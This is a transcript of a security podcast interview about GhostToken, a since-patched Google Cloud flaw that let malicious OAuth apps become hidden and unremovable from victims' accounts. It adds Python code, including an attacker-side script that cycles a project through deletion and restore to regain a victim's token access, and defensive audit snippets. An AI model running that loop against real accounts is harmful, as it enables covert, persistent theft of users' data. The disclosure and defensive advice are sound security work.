CyberWire Daily - Google's not being ghosted from vulnerabilities. [Research Saturday]
Episode Date: August 26, 2023

Tal Skverer from Astrix Security joins to discuss their work on "GhostToken – Exploiting GCP application infrastructure to create invisible, unremovable trojan app on Google accounts." Astrix's Security Research Group revealed a 0-day flaw in Google's Cloud Platform (GCP) on June 19, 2022, which was found to affect all Google users. The research states, "The vulnerability, dubbed “GhostToken”, could allow threat actors to change a malicious application to be invisible and unremovable, effectively leaving the victim’s Google account infected with a trojan app forever." Google issued a patch for this vulnerability in April of this year, but the researchers explain why it can still be severe. The research can be found here: GhostToken – Exploiting GCP application infrastructure to create invisible, unremovable trojan app on Google accounts
Transcript
You're listening to the CyberWire Network, powered by N2K. Like many of you, I was concerned about my data being sold by data brokers. So I decided to try Delete.me.
I have to say, Delete.me is a game changer. Within days of signing up, they started removing my
personal information from hundreds of data brokers. I finally have peace of mind knowing
my data privacy is protected. Delete.me's team does all the work for you with detailed reports
so you know exactly what's been done. Take control of your data and keep your private life private.

Hello, everyone, and welcome to the CyberWire's Research Saturday.
I'm Dave Bittner, and this is our weekly conversation with researchers and analysts
tracking down the threats and vulnerabilities,
solving some of the hard problems,
and protecting ourselves in a rapidly evolving cyberspace.
Thanks for joining us.
So, as part of our work, we do routine analysis of customers' environments
related to how non-human identities are connected to their environments,
and specifically in the Google Workspace environment.
And we saw something a bit odd.
That's Tal Skverer, research team lead at Astrix Security.
Today we're discussing their work Ghost Token,
exploiting GCP application infrastructure to create invisible, unremovable Trojan app on Google accounts.
We usually see apps that have, you know, readable names, like Google Drive for Work, stuff like that.
But in this case, we saw an app whose name was identical to its identifier, which is just a chain of random letters.
So when we dived a little deeper into that, we speculated that this happens if the developer of the app
deletes the app.
And then the backend at Google gets confused
and doesn't know where to take the name from.
And when we looked a little deeper into that,
we found out that when you create an app in Google,
it's actually contained within a project in Google Cloud Platform,
which is the cloud infrastructure that Google provides.
And then we went ahead and created our own app within some project in GCP.
And when we deleted the app itself, then the same thing happened.
The name of the app became its unique identifier.
But then we wondered what would happen if we deleted the entire project instead of just deleting the app. And when we deleted the project,
actually the same thing happened. So the name of the app was identical to its ID,
but in GCP they have this nice feature that, because a project usually contains
a large amount of data that may be important, they give you 30 days to reconsider your decision
to delete the project. And you can restore
the project to its original state. And we noticed that when the project is deleted, it's actually
not really deleted, it's in a pending deletion state, some kind of limbo
state. And during
this time, all the users that install
the app that is contained within
the project in GCP,
they cannot see the app
in the management page. So every user
who installed maybe, I don't know, tens
of apps, can see all the apps and the permissions that they gave them
in a single page.
And if the project that belonged to some app is deleted
or pending deletion, then they cannot see the app.
But we noticed that if we decide to restore the project
before 30 days have passed, then
all the original tokens,
which is basically the
unique password given by
Google to the app that
the app can use to access the user's
data, they start working again.
So the whole
attack scenario is pretty clear at this point.
Let's say that
a victim installs an attacker's app.
When the victim does that, the attacker can immediately delete the project
that is associated with the app because the attacker controls this project. Once they do this,
the victim cannot remove this app anymore because it's removed from the management page.
But the attacker at any time can restore the app,
quickly access the victim's data,
and then delete the project again so the app returns to this pending deletion state.
And this can go on forever
because every time you restore and delete the project,
the 30 days, they start again, they refresh.
So just so I'm clear here, I'm a user.
I download and install a Google app, and it turns out that that app is malicious.
And in installing that app, I have to grant that app permissions to access various things in my Google environment.
It could be my email.
It could be my files, whatever.
And so what you're saying is that what you've discovered here
is that the bad actor, if I go ahead and install a malicious app,
this mechanism allows the bad actors to basically disappear for a while
and then pop back up, grab some data, and then disappear for a while.
And they could do that forever.
And chances are, I would not know.
Exactly.
Yeah, that's exactly right.
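To make the cycle concrete, here is a minimal sketch, in Python, of the restore-access-hide loop described above, written from the attacker's side. It assumes an attacker-owned GCP project and OAuth client, plus the refresh token issued when the victim authorized the app; the project ID, client credentials, and token values are hypothetical placeholders, while the gcloud project delete/undelete commands and Google's OAuth token endpoint are standard, documented interfaces. This is an illustration of the mechanism as described in the interview, not a reproduction of the researchers' tooling, and the visibility gap it relied on has since been patched.

import subprocess
import requests

PROJECT_ID = "attacker-project-123456"       # hypothetical attacker-owned GCP project
CLIENT_ID = "1234567890-abc.apps.googleusercontent.com"  # hypothetical OAuth client in that project
CLIENT_SECRET = "REDACTED"                   # hypothetical
REFRESH_TOKEN = "REDACTED"                   # long-lived token issued when the victim authorized the app

def hide_app():
    # Deleting the project puts it into the ~30-day pending-deletion state;
    # before the patch, that also hid the app from the victim's permissions page.
    subprocess.run(["gcloud", "projects", "delete", PROJECT_ID, "--quiet"], check=True)

def restore_app():
    # Undeleting the project within the 30-day window brings the app back,
    # and the tokens it previously issued start working again.
    subprocess.run(["gcloud", "projects", "undelete", PROJECT_ID], check=True)

def get_access_token():
    # Exchange the long-lived refresh token for a short-lived access token,
    # which can then call whatever Google APIs the victim originally consented to.
    resp = requests.post("https://oauth2.googleapis.com/token", data={
        "client_id": CLIENT_ID,
        "client_secret": CLIENT_SECRET,
        "refresh_token": REFRESH_TOKEN,
        "grant_type": "refresh_token",
    })
    resp.raise_for_status()
    return resp.json()["access_token"]

# The loop: restore, grab data, hide again. Each delete/restore resets the
# 30-day window, which is why, before the fix, this could repeat indefinitely.
restore_app()
token = get_access_token()
# ... call Google APIs with `token` here ...
hide_app()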
And now a message from our sponsor, Zscaler, the leader in cloud security.
Enterprises have spent billions of dollars on firewalls and VPNs,
yet breaches continue to rise, with an 18% year-over-year increase in ransomware attacks
and a $75 million record payout in 2024.
These traditional security tools expand your attack surface with public-facing IPs
that are exploited by bad actors more easily than ever with AI tools.
It's time to rethink your security.
Zscaler Zero Trust Plus AI stops attackers by hiding your attack surface, making apps and IPs invisible, eliminating lateral movement, and connecting users only to specific apps, not the entire network.

And so what is going on under the hood with Google that allowed this to happen?
Okay, so I guess you can call this hindsight, but after the fact, when I prepared my talk for the upcoming DEF CON, I wondered how this scenario even came about in the first place.
And it led me to dive deep into the protocol called OAuth.
It's an authorization protocol released about a decade ago that basically powers this whole interaction between users, developers who have apps, and Google.
And when I looked into this protocol,
I noticed that while it really gives a good outline
of how the protocol is supposed to work,
it ignores two very crucial things
that basically allow this GhostToken vulnerability
to exist in the first place.
The first thing is the question of
what happens when you need to register an app.
So the original standard for OAuth doesn't really deal with that.
It leaves a lot of information to be decided by Google in this case.
Actually, in this instance, Google decided to include app registration within GCP,
which actually caused this whole project deletion,
pending deletion, and restore scenario.
And the second part that was missing
from the original protocol
is what happens in the user management page.
Because if Google had provided
a more thorough audit log of all accesses done by any apps to your account,
this whole vulnerability would be irrelevant,
because you would be able to see any access done by apps to your account.
So the attacker couldn't have hidden their app from the user.
So these two missing pieces were actually a big reason
that the vulnerability existed in the first place.
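For readers unfamiliar with OAuth, a rough sketch of the authorization request a third-party app sends to Google may help. The client ID, redirect URI, and scope below are hypothetical examples; the endpoints and parameters are Google's documented OAuth 2.0 interface.

from urllib.parse import urlencode

AUTH_ENDPOINT = "https://accounts.google.com/o/oauth2/v2/auth"
TOKEN_ENDPOINT = "https://oauth2.googleapis.com/token"

params = {
    "client_id": "1234567890-abc.apps.googleusercontent.com",  # issued when the app is registered inside a GCP project
    "redirect_uri": "https://app.example.com/oauth/callback",   # hypothetical
    "response_type": "code",
    "scope": "https://www.googleapis.com/auth/drive.readonly",  # what the user consents to
    "access_type": "offline",  # requests a refresh token, the long-lived credential discussed earlier
    "prompt": "consent",
}
consent_url = f"{AUTH_ENDPOINT}?{urlencode(params)}"
print(consent_url)

# A user who clicks through this consent screen is "installing" the app; the app
# then exchanges the returned authorization code at TOKEN_ENDPOINT for access and
# refresh tokens. Note that the core OAuth spec says nothing about how the app
# itself is registered (Google chose GCP projects) or how users later audit and
# revoke these grants, which are the two gaps described above.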
And so you reached out to Google here to let them know,
and they've been responsive?
Yeah.
So actually, they were really responsive at the beginning,
and I think about two months after I submitted it,
I got the famous "Nice catch," and they started working on the fix.
But apparently it wasn't that easy to fix.
The origin of the vulnerability came from deep within Google's infrastructure.
It has to do with how projects work in GCP and how apps within projects work and what they display to users and how they handle
tokens.
And I guess this was one of the reasons that caused Google to take a lot of time before
they found a good fix for it.
And during this process, they were quite responsive.
They were talking to me and we were trying to understand best what's the good way to
solve this issue.
And so ultimately what happened?
So in the end, they decided to, let's say, fix the issue by letting the users still see
apps that have been deleted.
They didn't fix the underlying issue.
They didn't see an issue in the fact that a project enters pending deletion state and you're able to restore it.
This works as intended. So they just changed it so
users can see apps
that belong to projects that are pending deletion.
Is there any evidence that anyone had been making use of this functionality?
Yeah, that's an excellent question.
I've really been wanting to know if it's true or not.
But it's very difficult to find out.
And the reason is that even if you are, let's say,
an administrator in your Google Workspace organization,
then you have more extensive audit logs about accesses done by apps.
But the problem is that when you try to find out in hindsight,
if someone exploited this vulnerability,
then all the accesses from this kind of app would look just like any other app's.
Because when the attacker restores the project associated with the app
and then accesses the user's data,
it looks like just another normal log entry from an app
that has a correct name.
The name issue is fixed when you restore the app.
So there is basically no good way to find out if anyone abused this.
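For Workspace admins who want to review that activity anyway, here is a minimal sketch, assuming a service account with domain-wide delegation, of pulling OAuth token audit events from the Admin SDK Reports API. As noted above, these logs show which apps accessed which accounts but cannot distinguish GhostToken abuse from ordinary app activity; the credentials file and admin address are hypothetical placeholders.

from google.oauth2 import service_account
from googleapiclient.discovery import build

SCOPES = ["https://www.googleapis.com/auth/admin.reports.audit.readonly"]

# Hypothetical service-account key with domain-wide delegation to an admin user.
creds = service_account.Credentials.from_service_account_file(
    "admin-sa.json", scopes=SCOPES
).with_subject("admin@example.com")

reports = build("admin", "reports_v1", credentials=creds)

# "token" activities record OAuth authorizations and API calls by third-party apps.
activities = reports.activities().list(userKey="all", applicationName="token").execute()
for activity in activities.get("items", []):
    actor = activity.get("actor", {}).get("email")
    for event in activity.get("events", []):
        print(actor, event.get("name"), event.get("parameters"))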
I'll also add that the problem is that deleting apps happens naturally,
statistically, in, I don't know, a number of cases.
We see it in environments that we work on.
So this makes it even harder because, let's say,
you found an app that accessed your user data and is now deleted.
You don't know if someone exploited the GhostToken vulnerability
or maybe the developer of the app decided to quit and delete the app.
It happens.
So what are your recommendations, then,
for folks who think that this may be a concern?
What can they do?
My first recommendation for people who are afraid of that is basically start by monitoring.
You have a special page as a Google user where you can see all apps that have access to your account and their permissions.
So start monitoring that and remove any app whose developer you don't trust enough with your Google data.
I recently found out that my TV has full access to my Google account for some reason.
Yeah.
So this is basically my recommendation for regular Google consumers. And for anyone who is an admin of a Google Workspace account,
I recommend putting restrictions on the new apps that your users can add.
For instance, there is a nice policy in Google Workspace that allows you to say
any new apps that my users are going to install themselves
will be unable to access their Drive or their
Gmail, which are the most sensitive services in Google.
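The per-user view mentioned above is the third-party access page in a Google account's security settings. For admins who prefer to automate that review across a domain, a minimal sketch using the Admin SDK Directory API's tokens.list method follows; the service-account key, delegated admin, and target user are hypothetical placeholders, and the scope restrictions on new apps are configured separately in the Workspace admin console.

from google.oauth2 import service_account
from googleapiclient.discovery import build

SCOPES = ["https://www.googleapis.com/auth/admin.directory.user.security"]

# Hypothetical service-account key with domain-wide delegation to an admin user.
creds = service_account.Credentials.from_service_account_file(
    "admin-sa.json", scopes=SCOPES
).with_subject("admin@example.com")

directory = build("admin", "directory_v1", credentials=creds)

# List every OAuth grant a given user has issued to third-party apps,
# along with the scopes each app holds.
tokens = directory.tokens().list(userKey="user@example.com").execute()
for t in tokens.get("items", []):
    print(t.get("displayText"), t.get("clientId"), t.get("scopes"))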
Our thanks to Tal Skverer from Astrix Security for joining us.
The research is titled Ghost Token, Exploiting GCP Application Infrastructure to Create Invisible Unremovable Trojan App on Google Accounts.
We'll have a link in the show notes.
And now a message from Black Cloak.
Did you know the easiest way for cybercriminals to bypass your company's defenses is by targeting your executives and their families at home?
Black Cloak's award-winning digital executive protection platform
secures their personal devices, home networks, and connected lives.
Because when executives are compromised at home, your company is at risk.
In fact, over one-third of new members discover they've already been breached.
Protect your executives and their families 24-7, 365, with Black Cloak.
Learn more at blackcloak.io.
The CyberWire Research Saturday podcast is a production of N2K Networks,
proudly produced in Maryland
out of the startup studios of DataTribe,
where they're co-building the next generation
of cybersecurity teams and technologies. This episode was produced by Liz Irvin and senior producer Jennifer Eiben.
Our mixer is Elliott Peltzman. Our executive editor is Peter Kilpe. And I'm Dave Bittner.
Thanks for listening.